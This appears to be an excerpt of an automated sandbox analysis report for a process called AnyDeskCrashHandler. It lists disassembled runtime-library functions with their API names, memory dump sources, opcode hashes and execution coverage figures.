                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: ed90df822e7d59495b79f906fc16800e7d9b52045c0eb292820e9cf29d7ca3ef
                                                                                                      • Instruction ID: 1a98ad1b83d9aa5aa302997cd05f2e6ef6ebb35d459c89aa5a8f4a0742be5eeb
                                                                                                      • Opcode Fuzzy Hash: ed90df822e7d59495b79f906fc16800e7d9b52045c0eb292820e9cf29d7ca3ef
                                                                                                      • Instruction Fuzzy Hash: 9031C421A1B643C1FE11AB12A4521B5A394BF14BA0FDB0579DD2D873A5EF3CE44A8320
                                                                                                      Function 00007FF7AA958700 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: 8b63ef19f9df0f4c288cac1842f9729c2262ba617c372d28031ee4c08f10457d
                                                                                                      • Instruction ID: d1176403e14dc790e1911e2910592353ca4865db39465e78f9e46acc0a0ddbc2
                                                                                                      • Opcode Fuzzy Hash: 8b63ef19f9df0f4c288cac1842f9729c2262ba617c372d28031ee4c08f10457d
                                                                                                      • Instruction Fuzzy Hash: E621CC20A0F24BC2FE1473615547139E2425F447F0FD686B1E93EC6AF6EE2CA40B9722
                                                                                                      Function 00007FF7AA95EF9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: da70c63ec7be9f21d8993bfcef2884285bdc39009cb66d938cb2b7c8fc8294fa
                                                                                                      • Instruction ID: 291e5e99b4dc0b5d500fc500fec08b347d24fc2e28b5954435a2ca5a45a7e0d8
                                                                                                      • Opcode Fuzzy Hash: da70c63ec7be9f21d8993bfcef2884285bdc39009cb66d938cb2b7c8fc8294fa
                                                                                                      • Instruction Fuzzy Hash: 6E11A231A19A82C2F7509B52A854325B2A0BF48BE4F950274E91DC37A4CF3CD8058711
                                                                                                      Function 00007FF7AA958878 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: afbb12fcad02bafca9b27522c9550e3d77d0b2974f4a39fa0265fdc4056edb3d
                                                                                                      • Instruction ID: 066671652f8030f9fc8f049bcc4ddf1a999aa43d320c58c67d4887451c0f9a5e
                                                                                                      • Opcode Fuzzy Hash: afbb12fcad02bafca9b27522c9550e3d77d0b2974f4a39fa0265fdc4056edb3d
                                                                                                      • Instruction Fuzzy Hash: 5611C220A0F247C1FE5873615556139E1429F443B0FD687B5E93E8A6F6EE2CA40B9322
                                                                                                      Function 00007FF7AA955E84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: dde18a94b78ce4f69966671a220012215f8160dd9c9082df2a2d100cd24f7ecd
                                                                                                      • Instruction ID: 114c7661bb39951acd1e7270dfdb6b344edf3f790cf778e626caf87c247ddf28
                                                                                                      • Opcode Fuzzy Hash: dde18a94b78ce4f69966671a220012215f8160dd9c9082df2a2d100cd24f7ecd
                                                                                                      • Instruction Fuzzy Hash: B9F0C261B1A606C2FF10AB25E855339E320EF487A0FA20279C56DC62F4DF2CD44AC321
                                                                                                      Function 00007FF7AA95F2EC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: 42c32d3acaf94be8bf6c9fa5576b7a947ae4a2e90c63d94789f449aabdcb8345
                                                                                                      • Instruction ID: 1f7f7934e9032faea60c759d8360c73f04d4a5a17f1c593a64534b3b958131e1
                                                                                                      • Opcode Fuzzy Hash: 42c32d3acaf94be8bf6c9fa5576b7a947ae4a2e90c63d94789f449aabdcb8345
                                                                                                      • Instruction Fuzzy Hash: 46113322D1BB03D1FF6C3528D44737991416F553B0E8A06B4E56DC62FAAE3CA94F4361
                                                                                                      Function 00007FF7AA958940 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA95895F
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA95897E
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA9589A6
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA9589B7
                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7AA9568F3,?,?,00000000,00007FF7AA956B8E,?,?,?,?,?,00007FF7AA956B1A), ref: 00007FF7AA9589C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: 0f9621ba38eac4d4c9221c1909a7449da67151443a31084acbc08cdd0f3ab668
                                                                                                      • Instruction ID: 5b481c268d35e1926468e0121f026054a561858b1b1738780b3e54fe7850d552
                                                                                                      • Opcode Fuzzy Hash: 0f9621ba38eac4d4c9221c1909a7449da67151443a31084acbc08cdd0f3ab668
                                                                                                      • Instruction Fuzzy Hash: 47115E20A0F24BC1FD5473655563179E1415F843B0E9683B5E86E86AE6EE2CA40B9723
                                                                                                      Function 00007FF7AA9587D4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value
                                                                                                      • String ID:
                                                                                                      • API String ID: 3702945584-0
                                                                                                      • Opcode ID: f6039cc51b31b971df3d7eac73341f43604306b93230684e8f15fcec3a0ebfc6
                                                                                                      • Instruction ID: 2892654dce70bb1fe8e8b4d073b08becb2a5cc16f6f73291f3275b32df124a25
                                                                                                      • Opcode Fuzzy Hash: f6039cc51b31b971df3d7eac73341f43604306b93230684e8f15fcec3a0ebfc6
                                                                                                      • Instruction Fuzzy Hash: 99113A10E0F20BC5FD58B261441317991418F40374EDA87B5EA3EC92F2ED2CB40BA322
                                                                                                      Function 00007FF7AA953DFC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2395640692-1018135373
                                                                                                      • Opcode ID: 9ec0b71a165466a9c67599c9ab78e621c696c82d4bac01c73983b7531b60d568
                                                                                                      • Instruction ID: b9295a5c9e4ad42a1e7329f2f46c93e35780cf3b2dbc715bac204455fe254132
                                                                                                      • Opcode Fuzzy Hash: 9ec0b71a165466a9c67599c9ab78e621c696c82d4bac01c73983b7531b60d568
                                                                                                      • Instruction Fuzzy Hash: B551E321B1A913CAFF14AB15D455A3AB3A5EB44B84F924075EE4E83394DF3CE8468710
                                                                                                      Function 00007FF7AA954B58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallEncodePointerTranslator
                                                                                                      • String ID: MOC$RCC
                                                                                                      • API String ID: 3544855599-2084237596
                                                                                                      • Opcode ID: 582590e0508bbd1300525430ea8ab693eb7a7b7207769477c28eb59a10e6996e
                                                                                                      • Instruction ID: c202a010b0c16fc7a1f86aca0cb4d4277fe578d48b4c222a7f2bbbf4a4bed4cb
                                                                                                      • Opcode Fuzzy Hash: 582590e0508bbd1300525430ea8ab693eb7a7b7207769477c28eb59a10e6996e
                                                                                                      • Instruction Fuzzy Hash: 2F61C232909BC6C1EBA0AB15E0413AAF7A5FBC5784F454265EB8C43B69DF7CE095CB10
                                                                                                      Function 00007FF7AA954F08 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 3896166516-3733052814
                                                                                                      • Opcode ID: 78f3bdf085cd92ad20dc991ed7b11ee6dea2a72f9a24a56b215421e1564ee266
                                                                                                      • Instruction ID: 4002d0d2cd2977885b8e9d5c76c6b3fe10261f4ecd7884922e14091b26380dba
                                                                                                      • Opcode Fuzzy Hash: 78f3bdf085cd92ad20dc991ed7b11ee6dea2a72f9a24a56b215421e1564ee266
                                                                                                      • Instruction Fuzzy Hash: 6051D132909243C6FF60AE25D056378B790EB40B84F9681B9DA4DC7BA2CF3DE45AC711
                                                                                                      Function 00007FF7AA95D540 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 2718003287-0
                                                                                                      • Opcode ID: d3fb5c5a4305f20a5b910567b94ca3d6b86f08d4eb07c482a73a96056ee82046
                                                                                                      • Instruction ID: 0c674fd47f96bfe1200f47a63550f0094395b470ce58687d31e0d385174c168b
                                                                                                      • Opcode Fuzzy Hash: d3fb5c5a4305f20a5b910567b94ca3d6b86f08d4eb07c482a73a96056ee82046
                                                                                                      • Instruction Fuzzy Hash: DDD1F432B0AA42C9FB11DF65D4402ACB7B1FB45B98B854276CE5D97BA9DE38D40BC310
                                                                                                      Function 00007FF7AA95DE68 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 32c044946483f12e34c0aebddd6752e03576959c90d964923d4dff6157d46c7f
                                                                                                      • Instruction ID: b3af552ce4f1a8a1c87b8d571dc7eec89d5d77f1b3590eef627ff48b5d7dfda6
                                                                                                      • Opcode Fuzzy Hash: 32c044946483f12e34c0aebddd6752e03576959c90d964923d4dff6157d46c7f
                                                                                                      • Instruction Fuzzy Hash: 3F91E472E09653C5FB50EB7584812BDABA0AB04788F9541BADE0E936A4CF3DD44BC721
                                                                                                      Function 00007FF7AA952E74 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: 9a9e087552f48f16067c4e9381aaf7e9c0349c56c42918a85502eba34d99e3bf
                                                                                                      • Instruction ID: b5d888d8c8a741f9f61dc8b7ccd28a47d3fcc18cd0bad42f5b5a14349f1f3f85
                                                                                                      • Opcode Fuzzy Hash: 9a9e087552f48f16067c4e9381aaf7e9c0349c56c42918a85502eba34d99e3bf
                                                                                                      • Instruction Fuzzy Hash: 72114822B19B41CAFF009F60E8542B873A4FB18758F851E31EA2D837A4DF38D1598350
                                                                                                      Function 00007FF7AA95DBD8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 6d23fd177495eb1cf3c6af8b1d658aefedd24363c73960ae3563ba64990bfd83
                                                                                                      • Instruction ID: abf385d4fba434087b506ef480a8f19aebb53c598e750bccb40846a7bb7ae86a
                                                                                                      • Opcode Fuzzy Hash: 6d23fd177495eb1cf3c6af8b1d658aefedd24363c73960ae3563ba64990bfd83
                                                                                                      • Instruction Fuzzy Hash: A941B422B1AA42C1EB20DF65E4453A9B7A0FB98794F924032EE4DC7768DF7CD446C750
                                                                                                      Function 00007FF7AA953D54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2223983686.00007FF7AA951000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA950000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2223960740.00007FF7AA950000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA96C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2223983686.00007FF7AA972000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224096573.00007FF7AA973000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2224128280.00007FF7AA974000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_7ff7aa950000_AnyDeskCrashHandler.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 4316c429adb968347ab1774c5765e22e2dafea5f83a08b0f330515f8cecce910
                                                                                                      • Instruction ID: f5bd8d87036b85b8c116a3a80cb4045f8b855ef286e3834d5ce76efb8a94cb77
                                                                                                      • Opcode Fuzzy Hash: 4316c429adb968347ab1774c5765e22e2dafea5f83a08b0f330515f8cecce910
                                                                                                      • Instruction Fuzzy Hash: B4116D32609B8182EB609F15F41026AB7E4FB88B84F994271EF8C47768DF3CC5568B00

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:8.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:943
                                                                                                      Total number of Limit Nodes:50
